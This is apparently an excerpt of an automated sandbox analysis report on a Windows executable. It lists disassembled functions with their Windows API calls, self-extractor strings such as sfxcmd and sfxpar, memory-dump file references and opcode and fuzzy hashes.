                          • DispatchMessageW.USER32(?), ref: 0038ACC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Message$DialogDispatchPeekTranslate
                          • String ID:
                          • API String ID: 1266772231-0
                          • Opcode ID: 85d9546955c6ad7b67ad2111a87c8f8b559ccecb05d9063eb89ad8dbabe52818
                          • Instruction ID: 874e6ccd1724997498b66ccac6376c334038da9321b4133e7880caf6535d1e11
                          • Opcode Fuzzy Hash: 85d9546955c6ad7b67ad2111a87c8f8b559ccecb05d9063eb89ad8dbabe52818
                          • Instruction Fuzzy Hash: 9CF03071D02229AB9B21ABE2EC4CDEB7F7CEE15751B408456F505D2100EB38D405C7B1
                          Function 0038A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1026 38a2c7-38a2e6 GetClassNameW 1027 38a2e8-38a2fd call 3817ac 1026->1027 1028 38a30e-38a310 1026->1028 1033 38a30d 1027->1033 1034 38a2ff-38a30b FindWindowExW 1027->1034 1030 38a31b-38a31f 1028->1030 1031 38a312-38a315 SHAutoComplete 1028->1031 1031->1030 1033->1028 1034->1033
                          APIs
                          • GetClassNameW.USER32(?,?,00000050), ref: 0038A2DE
                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 0038A315
                            • Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2
                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0038A305
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                          • String ID: EDIT
                          • API String ID: 4243998846-3080729518
                          • Opcode ID: 037109eac1ba7be8c9a182db10d2b37ac8a920b4a1e845e25c8765c7dbd6c0dc
                          • Instruction ID: cfe21b102c6937019df036958485d7a777a3ee77293fb0e9908d7a2a9ca75b50
                          • Opcode Fuzzy Hash: 037109eac1ba7be8c9a182db10d2b37ac8a920b4a1e845e25c8765c7dbd6c0dc
                          • Instruction Fuzzy Hash: F0F0A736A027287BE7326665AC05FDB776C9F46B10F090097BD45E6180D7A09D41C7F6
                          Function 0038D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1035 38d287-38d2b2 call 38e360 SetEnvironmentVariableW call 37fbd8 1039 38d2b7-38d2bb 1035->1039 1040 38d2bd-38d2c1 1039->1040 1041 38d2df-38d2e3 1039->1041 1042 38d2ca-38d2d1 call 37fcf1 1040->1042 1045 38d2c3-38d2c9 1042->1045 1046 38d2d3-38d2d9 SetEnvironmentVariableW 1042->1046 1045->1042 1046->1041
                          APIs
                          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0038D29D
                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0038D2D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: EnvironmentVariable
                          • String ID: sfxcmd$sfxpar
                          • API String ID: 1431749950-3493335439
                          • Opcode ID: 5760ee2b412093b10b022ff75f82704e510f1ec452a8c6cc7d8dc1fc6dc36a76
                          • Instruction ID: ec28e3390a4f91bf2e2c64f894d8407ed73f0c5ad22741ddc26b7a51699daf3f
                          • Opcode Fuzzy Hash: 5760ee2b412093b10b022ff75f82704e510f1ec452a8c6cc7d8dc1fc6dc36a76
                          • Instruction Fuzzy Hash: AAF0A772801328A6C7237F909C09AFA775CFF0A751B014491FC48A6241D665CD40D7F1
                          Function 0037984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 0037985E
                          • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00379876
                          • GetLastError.KERNEL32 ref: 003798A8
                          • GetLastError.KERNEL32 ref: 003798C7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorLast$FileHandleRead
                          • String ID:
                          • API String ID: 2244327787-0
                          • Opcode ID: aa1e7b09edba7ce89a5cacfc3fc2c4d5c0155d3f1757c764b2da970b4043896f
                          • Instruction ID: a47945522cca62cb55489fed8f03fd8670358b453fd42ef0ac94cf45e18a5475
                          • Opcode Fuzzy Hash: aa1e7b09edba7ce89a5cacfc3fc2c4d5c0155d3f1757c764b2da970b4043896f
                          • Instruction Fuzzy Hash: 9A115E31900604FBDB329A55C804B6977ACEB1B731F10C72BF46EA5A90D7399E409F53
                          Function 0039A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00393713,00000000,00000000,?,0039A49B,00393713,00000000,00000000,00000000,?,0039A698,00000006,FlsSetValue), ref: 0039A526
                          • GetLastError.KERNEL32(?,0039A49B,00393713,00000000,00000000,00000000,?,0039A698,00000006,FlsSetValue,003A7348,003A7350,00000000,00000364,?,00399077), ref: 0039A532
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0039A49B,00393713,00000000,00000000,00000000,?,0039A698,00000006,FlsSetValue,003A7348,003A7350,00000000), ref: 0039A540
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 8a5aacb4790a1dacf7079a0def6d09716cc6281c3ab3a5b0ef86ec177c3093f7
                          • Instruction ID: 17edb25a2c5e3bf756c95a59603c2f70114323accf3a83b9e95b1ec3f6228b7e
                          • Opcode Fuzzy Hash: 8a5aacb4790a1dacf7079a0def6d09716cc6281c3ab3a5b0ef86ec177c3093f7
                          • Instruction Fuzzy Hash: A601F732711622ABCF239A69AC44A67BB9CAF47BA1B270720F947D3140D721D900C6E1
                          Function 0039B188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00398FA5: GetLastError.KERNEL32(?,003B0EE8,00393E14,003B0EE8,?,?,00393713,00000050,?,003B0EE8,00000200), ref: 00398FA9
                            • Part of subcall function 00398FA5: _free.LIBCMT ref: 00398FDC
                            • Part of subcall function 00398FA5: SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 0039901D
                            • Part of subcall function 00398FA5: _abort.LIBCMT ref: 00399023
                            • Part of subcall function 0039B2AE: _abort.LIBCMT ref: 0039B2E0
                            • Part of subcall function 0039B2AE: _free.LIBCMT ref: 0039B314
                            • Part of subcall function 0039AF1B: GetOEMCP.KERNEL32(00000000,?,?,0039B1A5,?), ref: 0039AF46
                          • _free.LIBCMT ref: 0039B200
                          • _free.LIBCMT ref: 0039B236
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _free$ErrorLast_abort
                          • String ID: :
                          • API String ID: 2991157371-3499768093
                          • Opcode ID: 2e310b79c4b9581441e991ef83dc3bd2911cc6138dd035cddda09642f0f9a37f
                          • Instruction ID: 2568b230453c758a965c34aaf6adeda1b1b8d02ed1f955b096a96d179e5f1fce
                          • Opcode Fuzzy Hash: 2e310b79c4b9581441e991ef83dc3bd2911cc6138dd035cddda09642f0f9a37f
                          • Instruction Fuzzy Hash: 5C31D631904208AFDF12EFA9E951BADF7E5EF42320F264099E4149F292EB719D41CB50
                          Function 00379F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0037CC94,00000001,?,?,?,00000000,00384ECD,?,?,?), ref: 00379F4C
                          • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00384ECD,?,?,?,?,?,00384972,?), ref: 00379F8E
                          • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0037CC94,00000001,?,?), ref: 00379FB8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: FileWrite$Handle
                          • String ID:
                          • API String ID: 4209713984-0
                          • Opcode ID: 3fa5a507cb1f27bd64609231bd283a6f29a49f51604234d10482a9ad52d16e59
                          • Instruction ID: 16d2ad2b97acdd75e4df3fe257f9b4272de1ab066fab3fc4341696c38792f069
                          • Opcode Fuzzy Hash: 3fa5a507cb1f27bd64609231bd283a6f29a49f51604234d10482a9ad52d16e59
                          • Instruction Fuzzy Hash: AA3126312083059BDF368F14DC4876ABBA8EB95711F048A1EF949DB281C778DD48CBB2
                          Function 0037A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A22E
                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A261
                          • GetLastError.KERNEL32(?,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A27E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CreateDirectory$ErrorLast
                          • String ID:
                          • API String ID: 2485089472-0
                          • Opcode ID: fac8385b0e852a1ec1fadd37d8882d9f26d3cec66ee35017fb3987f6cb19846e
                          • Instruction ID: 02cc6e12b0b1c79e1833a3e5e56b4d50a6456fd2ab73e5e7124be30c31ce388d
                          • Opcode Fuzzy Hash: fac8385b0e852a1ec1fadd37d8882d9f26d3cec66ee35017fb3987f6cb19846e
                          • Instruction Fuzzy Hash: 09019231144A14A6DB33AB644C05BED735CAF4B742F05CC55F909E9052DB6ECA81C6A7
                          Function 0039AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                          Download Yara Rule
                          APIs
                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0039B019
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Info
                          • String ID:
                          • API String ID: 1807457897-3916222277
                          • Opcode ID: 5eeb1f329c7c202ec8272997e8b97d4e50cb9d7a8a539e4d03e7ce6ca75d4dd7
                          • Instruction ID: 802ce4bd57b3c0643b0687b8a6d95963aa4605fba6bf6f3cb4708ebfbc0dbbff
                          • Opcode Fuzzy Hash: 5eeb1f329c7c202ec8272997e8b97d4e50cb9d7a8a539e4d03e7ce6ca75d4dd7
                          • Instruction Fuzzy Hash: 6341F4B050438C9BDF238A289D94AEBFBADEB45704F1404EDE59A87242D335AA458F60
                          Function 0039A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0039A79D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: String
                          • String ID: LCMapStringEx
                          • API String ID: 2568140703-3893581201
                          • Opcode ID: 89f8547ac6c7f4598eb6fc08a9778158b08fae8971396ba2b02a9e6edb1a823c
                          • Instruction ID: a40b9f43928c167aa55313893f04e80138aff82326864d7b5223b1e0c2130465
                          • Opcode Fuzzy Hash: 89f8547ac6c7f4598eb6fc08a9778158b08fae8971396ba2b02a9e6edb1a823c
                          • Instruction Fuzzy Hash: FB01E53654420DBBCF03AFA4DC46DEE7F66EF09750F054654FE1425160CA768A31EB91
                          Function 0039A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00399D2F), ref: 0039A715
                          Strings
                          • InitializeCriticalSectionEx, xrefs: 0039A6E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CountCriticalInitializeSectionSpin
                          • String ID: InitializeCriticalSectionEx
                          • API String ID: 2593887523-3084827643
                          • Opcode ID: 67dac8e31834aa2c73b6aaa78cc165f09ccc58b5b9eccc27b888dfeb554fe1e7
                          • Instruction ID: cac3eeb2d3e638e65a6d2a6b121246c19a28a0cdc51633ae3433276e4cf749d2
                          • Opcode Fuzzy Hash: 67dac8e31834aa2c73b6aaa78cc165f09ccc58b5b9eccc27b888dfeb554fe1e7
                          • Instruction Fuzzy Hash: E5F0BE3264561CBBCF136FA0CC06CEE7F65EF06760F014654FC092A260DA718A10ABD1
                          Function 0039A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Alloc
                          • String ID: FlsAlloc
                          • API String ID: 2773662609-671089009
                          • Opcode ID: 6379dc02820d56603cc65fdec725d33204efce7b0623cd41753bc19b60f8977d
                          • Instruction ID: e880615fa1278525613ca95f22d288e0a49adb8e0dae1a068b668efb8a47c093
                          • Opcode Fuzzy Hash: 6379dc02820d56603cc65fdec725d33204efce7b0623cd41753bc19b60f8977d
                          • Instruction Fuzzy Hash: E8E05531B852286B8A136B60CC029EEBBA8CB17710F060254FC051B280CE704E0092D6
                          Function 0039329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • try_get_function.LIBVCRUNTIME ref: 003932AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: try_get_function
                          • String ID: FlsAlloc
                          • API String ID: 2742660187-671089009
                          • Opcode ID: 5f0434747d520a5332fb778a9226e4d8459742939a9a3ce3434b0f99b96a1712
                          • Instruction ID: 19bfd5c3d6d9ec8c69a1636c193eb07f2d9d9d628fa289bc490bee2562632122
                          • Opcode Fuzzy Hash: 5f0434747d520a5332fb778a9226e4d8459742939a9a3ce3434b0f99b96a1712
                          • Instruction Fuzzy Hash: BBD05B627817346BD51336D56C039EE7E44C703FF5F450592FE0C5E16395A1455142D5
                          Function 0038E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038E20B
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID: 3Ro
                          • API String ID: 1269201914-1492261280
                          • Opcode ID: 6ef6ed525a39592a999bb97318b267ffcbfd45a51e1166c1337b2ed0b0a68212
                          • Instruction ID: 9bc730dd8659999169b90c9a4c664a4390e9eaa94a827c9fd80d13176dc73dc0
                          • Opcode Fuzzy Hash: 6ef6ed525a39592a999bb97318b267ffcbfd45a51e1166c1337b2ed0b0a68212
                          • Instruction Fuzzy Hash: 5AB012A666E201BCB20F31017D06C77032CC4C0B52330845FF205D80C195404C055132
                          Function 0039B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039AF1B: GetOEMCP.KERNEL32(00000000,?,?,0039B1A5,?), ref: 0039AF46
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0039B1EA,?,00000000), ref: 0039B3C4
                          • GetCPInfo.KERNEL32(00000000,0039B1EA,?,?,?,0039B1EA,?,00000000), ref: 0039B3D7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CodeInfoPageValid
                          • String ID:
                          • API String ID: 546120528-0
                          • Opcode ID: 756c8ec625d8a287cbbd27375a0a7502e08cdc27affc9b88d0345d6fdb1719a3
                          • Instruction ID: 5a74f5c9374bec7dd3214ff9b92efc7fb1d053dbd85740b7e4d744aa62f4fe77
                          • Opcode Fuzzy Hash: 756c8ec625d8a287cbbd27375a0a7502e08cdc27affc9b88d0345d6fdb1719a3
                          • Instruction Fuzzy Hash: CF5153709003059FDF279F36E9806BAFBE8EF41300F19806ED0968B253D7399942EB90
                          Function 00371385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00371385
                            • Part of subcall function 00376057: __EH_prolog.LIBCMT ref: 0037605C
                            • Part of subcall function 0037C827: __EH_prolog.LIBCMT ref: 0037C82C
                            • Part of subcall function 0037C827: new.LIBCMT ref: 0037C86F
                            • Part of subcall function 0037C827: new.LIBCMT ref: 0037C893
                          • new.LIBCMT ref: 003713FE
                            • Part of subcall function 0037B07D: __EH_prolog.LIBCMT ref: 0037B082
                          Memory Dump Source
